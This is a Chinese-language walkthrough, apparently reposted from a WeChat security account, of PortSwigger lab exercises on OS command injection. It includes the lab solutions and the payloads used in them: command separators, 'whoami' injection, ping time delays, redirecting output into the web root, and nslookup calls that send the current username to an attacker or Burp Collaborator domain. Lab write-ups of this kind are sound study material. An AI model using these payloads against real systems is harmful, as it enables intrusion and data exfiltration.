导读:
面向读者:对于网络安全方面的学者。
本文知识点:
靶场地址:https://portswigger.net/web-security
让读者如虎添翼
助你一臂之力
📋问题1:需要准备些什么?
一、操作系统命令注入
1、意义
2、有用的命令
识别操作系统命令注入漏洞后,执行一些初始命令以获取有关已受损系统的信息
一些在Linux和Windows平台上有用的命令的摘要:
命令的目的 Linux操作系统 Windows
当前用户的名称 whoami whoami
操作系统 uname -a ver
网络配置 ifconfig ipconfig /all
网络连接 netstat -an netstat -an
运行进程 ps -ef tasklist
3、注入操作系统命令的方式
1、以下命令分隔符在基于Windows和基于Unix的系统上都有效:
&
&&
|
||
2、以下命令分隔符仅适用于基于Unix的系统:
;
换行符(0x0a或n)
3、在基于Unix的系统上,您还可以使用反勾号或美元字符在原始命令中执行插入命令的内联执行:
'
注入命令'
$(插入命令)
4、防止操作系统命令注入攻击
如果使用用户提供的输入调用OS命令是不可避免的,则必须执行强输入验证:
1、根据允许值的白名单进行验证。
2、验证输入是否为数字。
3、验证输入是否仅包含字母数字字符,而不包含其他语法或空白。
4、不要试图通过转义shell元字符来清理输入(非常容易出错,且容易被熟练的攻击者绕过)
二、执行任意命令
1、示例:
1、一个购物应用程序:
允许用户查看某个商品在特定商店中是否有库存
可通过以下URL:
https://insecure-website.com/stockStatus?productID=381&storeID=29
2、需查询其他系统:
提供股票信息,应用程序必须查询各种遗留系统。该功能是通过调用shell命令并将产品和商店ID作为参数来实现,如
stockreport.pl 381 29(此命令输出指定项目的库存状态,并返回给用户)
------
攻击者:
如果应用程序未实现针对操作系统命令注入的防御措施,攻击者可以提交以下输入来执行任意命令:
& echo aiwefwlguh &
如果此输入在产品ID参数,则应用程序执行的命令为:
stockreport.pl & echo aiwefwlguh & 29
将附加命令分隔符&放置在插入的命令之后,结合echo命令输出回显,这是测试某些类型的操作系统命令注入的有用方法,降低了阻止执行注入命令的可能性(&字符是shell命令分隔符,因此执行的是三个独立的命令)
返回给用户的输出为:
Error - productID was not provided (stockreport.pl执行时未使用预期参数,返回错误提示)
aiwefwlguh (执行注入的echo命令,并输出)
29: command not found (参数29作为命令执行,导致错误)
实验1:操作系统命令注入(简单)
1|whoami
三、盲操作系统命令注入漏洞
1、简述
2、示例
mail -s "This site is great" -aFrom:[email protected] [email protected]
3、使用时间延迟检测盲OS命令注入
& ping -c 10 127.0.0.1 &
实验2:具有时延的操作系统命令盲注入
email=x||ping+-c+10+127.0.0.1||
4、通过重定向输出利用盲目操作系统命令注入
& whoami > /var/www/static/whoami.txt &
(学过Linux的应该都会这些命令)
实验3:带有输出重定向的盲操作系统命令注入
email=||whoami>/var/www/images/output.txt||
filename=output.txt
5、利用带外(OAST)技术
& nslookup kgji2ohoyw.web-attacker.com &
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
wwwuser.kgji2ohoyw.web-attacker.com
实验4:具有带外交互的盲OS命令注入
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
我的是:
email=x||nslookup+4injhpna543tc1766dwv1466ux0noc.burpcollaborator.net||
实验5:具有带外数据泄漏的盲操作系统命令注入
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
我的是:
email=x||nslookup+`whoami`.fl45n2ug5x4nmill7s67s7u7jypodd.burpcollaborator.net||
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
原文始发于微信公众号(渗透安全团队):【Burp系列】超全命令执行漏洞实验总结(建议收藏)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论